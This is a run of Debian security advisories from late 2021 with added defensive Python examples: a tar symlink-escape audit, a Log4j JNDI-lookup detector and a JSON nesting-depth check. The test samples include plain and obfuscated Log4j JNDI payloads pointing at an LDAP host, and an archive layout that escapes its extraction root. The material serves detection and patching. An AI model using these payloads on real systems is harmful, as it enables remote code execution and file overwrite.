Debian Security Advisory

    • Official post

    Package : postgresql-13

    CVE ID : CVE-2021-23214 CVE-2021-23222


    Jacob Champion discovered two vulnerabilities in the PostgreSQL database system, which could result in man-in-the-middle attacks.


    For the stable distribution (bullseye), these problems have been fixed in version 13.5-0+deb11u1.


    We recommend that you upgrade your postgresql-13 packages.


    For the detailed security status of postgresql-13 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/postgresql-13


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : node-tar

    CVE ID : CVE-2021-37701 CVE-2021-37712


    It was discovered that the symlink extraction protections in node-tar, a Tar archive module for Node.js, could be bypassed, allowing a malicious Tar archive to symlink into an arbitrary location.
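    The class of bypass described here is an archive that first creates a symlink and then carries a later entry whose path runs through that link, so the write lands wherever the link points; on case-insensitive or Unicode-normalising filesystems the later entry can even spell the link's name differently. The following is an added example, not node-tar's code and not Debian's: a dry-run audit in Python that walks a tar archive in entry order and reports every entry a safe extractor must refuse, without writing anything to disk. The sample archive is constructed in memory; the decision to treat names that differ only in case or Unicode normalisation as the same path component is a conservative assumption of this example.

```python
import io
import posixpath
import tarfile
import unicodedata


def _key(component: str) -> str:
    # Assumption (conservative): a name that differs only in case or Unicode
    # normalisation may hit the same directory entry on some filesystems.
    return unicodedata.normalize("NFC", component).casefold()


def _escapes(base_dir: str, link_target: str) -> bool:
    """True if link_target, resolved relative to base_dir, leaves the extraction root."""
    if link_target.startswith("/"):
        return True
    resolved = posixpath.normpath(posixpath.join(base_dir, link_target))
    return resolved == ".." or resolved.startswith("../")


def audit_archive(blob: bytes) -> list:
    """Dry-run the archive in entry order; return (entry, reason) for each entry
    a safe extractor must refuse. Nothing is written to disk."""
    problems = []
    symlinks = {}  # canonical path components -> link target, in archive order
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r") as tf:
        for m in tf.getmembers():
            name = posixpath.normpath(m.name)
            if name.startswith("/") or name == ".." or name.startswith("../"):
                problems.append((m.name, "absolute or parent-traversing path"))
                continue
            parts = name.split("/")
            # Every directory on the way to this entry must be a real directory:
            # if any prefix was created as a symlink earlier in the archive, the
            # write would follow that link instead.
            through = next(
                ("/".join(parts[:i]) for i in range(1, len(parts))
                 if tuple(map(_key, parts[:i])) in symlinks),
                None,
            )
            if through is not None:
                problems.append((m.name, f"path passes through symlink {through!r}"))
                continue
            if m.issym():
                if _escapes(posixpath.dirname(name), m.linkname):
                    problems.append((m.name, f"symlink target escapes root: {m.linkname!r}"))
                # Record it either way: a lenient extractor would have created it.
                symlinks[tuple(map(_key, parts))] = m.linkname
            elif m.islnk() and _escapes("", m.linkname):
                problems.append((m.name, f"hard link target escapes root: {m.linkname!r}"))
    return problems


def build_sample_archive() -> bytes:
    """Constructed sample archive for the audit above (not a real-world artifact)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        def add_file(path, data):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))

        def add_symlink(path, target):
            info = tarfile.TarInfo(path)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tf.addfile(info)

        add_file("app/index.js", b"module.exports = {};\n")  # benign
        add_symlink("current", "app")                         # stays inside the root
        add_file("current/config.json", b"{}")                # write through a symlink
        add_symlink("plugins", "../../usr/lib")               # points outside the root
        add_file("Plugins/evil.so", b"\x7fELF")               # case variant of that link
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in audit_archive(build_sample_archive()):
        print(f"refuse {entry}: {reason}")
```

    The within-root link "current" is accepted on its own, but the later write through it is still refused: an extractor that trusts such links has to guarantee they still point inside the root at write time, which is exactly the check the bypass defeated.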


    For the stable distribution (bullseye), these problems have been fixed in version 6.0.5+ds1+~cs11.3.9-1+deb11u2.


    We recommend that you upgrade your node-tar packages.


    For the detailed security status of node-tar please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/node-tar


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : tomcat9

    CVE ID : CVE-2021-42340


    Apache Tomcat, the servlet and JSP engine, did not properly release an HTTP upgrade connection for WebSocket connections once the WebSocket connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.


    For the stable distribution (bullseye), this problem has been fixed in version 9.0.43-2~deb11u3.


    We recommend that you upgrade your tomcat9 packages.


    For the detailed security status of tomcat9 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/tomcat9


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : libxml-security-java

    CVE ID : CVE-2021-40690

    Debian Bug : 994569


    Apache Santuario - XML Security for Java is vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.


    For the oldstable distribution (buster), this problem has been fixed in version 2.0.10-2+deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.0.10-2+deb11u1.


    We recommend that you upgrade your libxml-security-java packages.


    For the detailed security status of libxml-security-java please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/libxml-security-java


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : salt

    CVE ID : CVE-2021-21996 CVE-2021-31607 CVE-2021-25284 CVE-2021-25283

    CVE-2021-25282 CVE-2021-25281 CVE-2021-3197 CVE-2021-3148

    CVE-2021-3144 CVE-2020-35662 CVE-2020-28972 CVE-2020-28243

    Debian Bug : 983632 994016 987496


    Multiple security vulnerabilities have been discovered in Salt, a powerful remote execution manager, that allow for local privilege escalation on a minion, server side template injection attacks, insufficient checks for eauth credentials, shell and command injections or incorrect validation of SSL certificates.


    For the oldstable distribution (buster), these problems have been fixed in version 2018.3.4+dfsg1-6+deb10u3.


    For the stable distribution (bullseye), these problems have been fixed in version 3002.6+dfsg1-4+deb11u1.


    We recommend that you upgrade your salt packages.


    For the detailed security status of salt please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/salt


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : openjdk-17

    CVE ID : CVE-2021-35556 CVE-2021-35559 CVE-2021-35561 CVE-2021-35564

    CVE-2021-35567 CVE-2021-35578 CVE-2021-35586 CVE-2021-35603


    Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service, incorrect Kerberos ticket use, selection of weak ciphers or information disclosure.


    For the stable distribution (bullseye), these problems have been fixed in version 17.0.1+12-1+deb11u2.


    We recommend that you upgrade your openjdk-17 packages.


    For the detailed security status of openjdk-17 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/openjdk-17


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : roundcube

    CVE ID : CVE-2021-44025 CVE-2021-44026

    Debian Bug : 1000156


    It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not properly sanitize requests and mail messages. This would allow an attacker to perform Cross-Site Scripting (XSS) or SQL injection attacks.


    For the oldstable distribution (buster), these problems have been fixed in version 1.3.17+dfsg.1-1~deb10u1.


    For the stable distribution (bullseye), these problems have been fixed in version 1.4.12+dfsg.1-1~deb11u1.


    We recommend that you upgrade your roundcube packages.


    For the detailed security status of roundcube please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/roundcube


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : icu

    CVE ID : CVE-2020-21913


    Rongxin Wu discovered a use-after-free vulnerability in the International Components for Unicode (ICU) library which could result in denial of service or potentially the execution of arbitrary code.


    For the oldstable distribution (buster), this problem has been fixed in version 63.1-6+deb10u2.


    We recommend that you upgrade your icu packages.


    For the detailed security status of icu please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/icu


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : samba

    CVE ID : CVE-2020-25717


    Andrew Bartlett discovered that Samba, an SMB/CIFS file, print, and login server for Unix, may map domain users to local users in an undesired way. This could allow a user in an AD domain to potentially become root on domain members.


    A new parameter "min domain uid" (default 1000) has been added to specify the minimum uid allowed when mapping a local account to a domain account.


    Further details and workarounds can be found in the upstream advisory https://www.samba.org/samba/security/CVE-2020-25717.html


    For the oldstable distribution (buster), this problem has been fixed in version 2:4.9.5+dfsg-5+deb10u2. Additionally the update mitigates CVE-2020-25722. Unfortunately the changes required to fix additional CVEs affecting Samba as an AD-compatible domain controller are too invasive to be backported. Thus users using Samba as an AD-compatible domain controller are encouraged to migrate to Debian bullseye. From this point onwards AD domain controller setups are no longer supported in Debian oldstable.


    We recommend that you upgrade your samba packages.


    For the detailed security status of samba please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/samba


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : nss

    CVE ID : CVE-2021-43527


    Tavis Ormandy discovered that nss, the Mozilla Network Security Service library, is prone to a heap overflow flaw when verifying DSA or RSA-PSS signatures, which could result in denial of service or potentially the execution of arbitrary code.


    For the oldstable distribution (buster), this problem has been fixed in version 2:3.42.1-1+deb10u4.


    For the stable distribution (bullseye), this problem has been fixed in version 2:3.61-1+deb11u1.


    We recommend that you upgrade your nss packages.


    For the detailed security status of nss please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/nss


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : xen

    CVE ID : CVE-2021-28704 CVE-2021-28705 CVE-2021-28706
    CVE-2021-28707 CVE-2021-28708 CVE-2021-28709

    Multiple vulnerabilities have been discovered in the Xen hypervisor,
    which could result in privilege escalation, denial of service or
    information leaks.

    For the stable distribution (bullseye), these problems have been fixed in
    version 4.14.3+32-g9de3671772-1~deb11u1.

    We recommend that you upgrade your xen packages.

    For the detailed security status of xen please refer to
    its security tracker page at:
    https://security-tracker.debian.org/tracker/xen

    Further information about Debian Security Advisories, how to apply
    these updates to your system and frequently asked questions can be
    found at: https://www.debian.org/security/

    • Official post

    Package : python-babel

    CVE ID : CVE-2021-20095
    Debian Bug : 987824

    It was discovered that missing input sanitising in Babel, a set of
    tools for internationalising Python applications, could result in
    the execution of arbitrary code.

    For the oldstable distribution (buster), this problem has been fixed
    in version 2.6.0+dfsg.1-1+deb10u1.

    We recommend that you upgrade your python-babel packages.

    For the detailed security status of python-babel please refer to
    its security tracker page at:
    https://security-tracker.debian.org/tracker/python-babel

    Further information about Debian Security Advisories, how to apply
    these updates to your system and frequently asked questions can be
    found at: https://www.debian.org/security/

    • Official post

    Package : wireshark

    CVE ID : CVE-2021-22207 CVE-2021-22222 CVE-2021-22235 CVE-2021-39920

    CVE-2021-39921 CVE-2021-39922 CVE-2021-39923 CVE-2021-39924

    CVE-2021-39925 CVE-2021-39926 CVE-2021-39928 CVE-2021-39929


    Multiple vulnerabilities have been discovered in Wireshark, a network protocol analyzer which could result in denial of service or the execution of arbitrary code.


    For the oldstable distribution (buster), CVE-2021-39925 has been fixed in version 2.6.20-0+deb10u2.


    For the stable distribution (bullseye), these problems have been fixed in version 3.4.10-0+deb11u1.


    We recommend that you upgrade your wireshark packages.


    For the detailed security status of wireshark please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/wireshark


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : apache-log4j2

    CVE ID : CVE-2021-44228 CVE-2020-9488

    Debian Bug : 959450 1001478


    Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular logging framework for Java. JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From version 2.15.0, this behavior has been disabled by default.
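    Attackers rarely send the literal ${jndi:ldap://...} string; they hide it behind other lookups that Log4j resolves first, such as ${${lower:j}ndi:...} or ${${::-j}ndi:...}, so a grep for "jndi" misses most real probes. The following is an added example, not code from Apache Log4j or from Debian: a Python detector that folds the lookups commonly used for obfuscation (the lower: and upper: prefixes and the :-default fallback, an assumed subset of Log4j 2 lookup syntax) until nothing more resolves, then looks for a JNDI lookup in the canonical form. The access-log lines are constructed, not captured traffic.

```python
import re

# Innermost ${...} lookup, i.e. one that contains no further braces.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate the lookups used for obfuscation; return None if unknown.

    Assumed subset of Log4j 2 syntax: 'lower:' and 'upper:' prefixes and the
    ':-default' fallback, so ${::-j} and ${env:NaN:-j} both yield 'j'.
    Anything else, including jndi:, is left untouched on purpose.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, key = body.partition(":")
    if sep and prefix.lower() == "lower":
        return key.lower()
    if sep and prefix.lower() == "upper":
        return key.upper()
    return None


def canonicalize(text: str, max_rounds: int = 50) -> str:
    """Fold innermost lookups, one nesting level per round, until stable."""
    for _ in range(max_rounds):
        changed = False

        def fold(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = _INNERMOST.sub(fold, text)
        if not changed:
            break
    return text


def is_jndi_lookup(line: str) -> bool:
    return _JNDI.search(canonicalize(line)) is not None


def scan(lines):
    """Return (line number, canonical form) for every line carrying a JNDI lookup."""
    return [(n, canonicalize(l)) for n, l in enumerate(lines, 1) if is_jndi_lookup(l)]


# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET /login HTTP/1.1" 302 0 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${::-l}dap://198.51.100.7:1389/b}"',
    '203.0.113.2 - - [10/Dec/2021:14:02:15 +0000] "GET /?u=${ctx:loginId} HTTP/1.1" 200 12 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for n, canonical in scan(SAMPLE_LOG):
        print(f"line {n}: {canonical}")
```

    Lookups the folder does not understand are left in place, so a nested lookup that survives canonicalization in a field an external client controls (User-Agent, X-Forwarded-For, a login name) is itself worth alerting on even when no jndi: emerges.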


    This update also fixes CVE-2020-9488 in the oldstable distribution (buster): the Apache Log4j SMTP appender did not properly validate the server certificate against the host name, so an SMTPS connection could be intercepted by a man-in-the-middle attacker, leaking any log messages sent through that appender.


    For the oldstable distribution (buster), this problem has been fixed in version 2.15.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.15.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : openjdk-11

    CVE ID : CVE-2021-35550 CVE-2021-35556 CVE-2021-35559 CVE-2021-35561

    CVE-2021-35564 CVE-2021-35565 CVE-2021-35567 CVE-2021-35578

    CVE-2021-35586 CVE-2021-35603


    Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service, incorrect Kerberos ticket use, selection of weak ciphers or information disclosure.


    For the oldstable distribution (buster), these problems have been fixed in version 11.0.13+8-1~deb10u1.


    We recommend that you upgrade your openjdk-11 packages.


    For the detailed security status of openjdk-11 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/openjdk-11


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : mediawiki

    CVE ID : CVE-2021-44857 CVE-2021-44858 CVE-2021-45038


    Multiple security issues were discovered in MediaWiki, a website engine for collaborative work: Vulnerabilities in the mcrundo and rollback actions may allow an attacker to leak page content from private wikis or to bypass edit restrictions.


    For additional information please refer to https://www.mediawiki.org/wiki/2021-12_security_release/FAQ


    For the oldstable distribution (buster), these problems have been fixed in version 1:1.31.16-1+deb10u2.


    For the stable distribution (bullseye), these problems have been fixed in version 1:1.35.4-1+deb11u2.


    We recommend that you upgrade your mediawiki packages.


    For the detailed security status of mediawiki please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/mediawiki


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : apache-log4j2

    CVE ID : CVE-2021-45046

    Debian Bug : 1001729


    It was found that the fix to address CVE-2021-44228 in Apache Log4j, a logging framework for Java, was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack.


    For the oldstable distribution (buster), this problem has been fixed in version 2.16.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.16.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : modsecurity-apache

    CVE ID : CVE-2021-42717


    It was discovered that modsecurity-apache, an Apache module to tighten web application security, does not properly handle excessively nested JSON objects, which could result in denial of service. The update introduces a new 'SecRequestBodyJsonDepthLimit' option to limit the maximum JSON parsing depth of a request body that ModSecurity will accept (default 10000).
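    A depth limit matters because a recursive JSON parser spends one stack frame per nesting level, so a body of a few hundred kilobytes of "[" is enough to exhaust the stack or the heap before any rule runs. The following is an added example, not ModSecurity's code: a Python pre-check that scans the raw body once, without recursion, and rejects it as soon as the nesting exceeds the limit, in the spirit of the new directive but for a service that parses JSON itself. The sample bodies are constructed; the 10000 default only mirrors the advisory's figure, and a service whose own parser recurses should pick a limit well below its recursion limit.

```python
import json


class JsonTooDeep(ValueError):
    """Raised before parsing when the request body nests deeper than allowed."""


def json_nesting_depth(raw: str, limit: int) -> int:
    """Scan raw JSON text once and return its maximum [ / { nesting depth,
    raising JsonTooDeep as soon as the depth exceeds limit. Brackets inside
    string literals are skipped, honouring backslash escapes."""
    depth = max_depth = 0
    in_string = escaped = False
    for ch in raw:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > limit:
                raise JsonTooDeep(f"nesting depth exceeds limit of {limit}")
            max_depth = max(max_depth, depth)
        elif ch in "]}":
            depth -= 1
    return max_depth


def exceeds_depth(raw: str, limit: int) -> bool:
    try:
        json_nesting_depth(raw, limit)
    except JsonTooDeep:
        return True
    return False


def safe_loads(raw: str, limit: int = 10000):
    """Parse only after the depth check: the scan is linear and uses no
    recursion, so a hostile body is rejected before it can touch the stack."""
    json_nesting_depth(raw, limit)
    return json.loads(raw)


# Constructed sample bodies (not real traffic).
BENIGN = '{"user": "alice", "roles": ["admin", {"scope": "[[not nesting]]"}]}'
HOSTILE = "[" * 200000 + "]" * 200000

if __name__ == "__main__":
    print("benign depth:", json_nesting_depth(BENIGN, 10000))
    try:
        safe_loads(HOSTILE, limit=10000)
    except JsonTooDeep as e:
        print("rejected:", e)
```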


    For the oldstable distribution (buster), this problem has been fixed in version 2.9.3-1+deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.9.3-3+deb11u1.


    We recommend that you upgrade your modsecurity-apache packages.


    For the detailed security status of modsecurity-apache please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/modsecurity-apache


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : apache-log4j2

    CVE ID : CVE-2021-45105

    Debian Bug : 1001891


    It was found that Apache Log4j2, a Logging Framework for Java, did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a denial of service.


    For the oldstable distribution (buster), this problem has been fixed in version 2.17.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.17.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Official post

    Package : tang

    CVE ID : CVE-2021-4076


    A flaw was discovered in tang, a network-based cryptographic binding server, which could result in leak of private keys.


    For the stable distribution (bullseye), this problem has been fixed in version 8-3+deb11u1.


    We recommend that you upgrade your tang packages.


    For the detailed security status of tang please refer to its security tracker page at:
    https://security-tracker.debian.org/tracker/tang


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/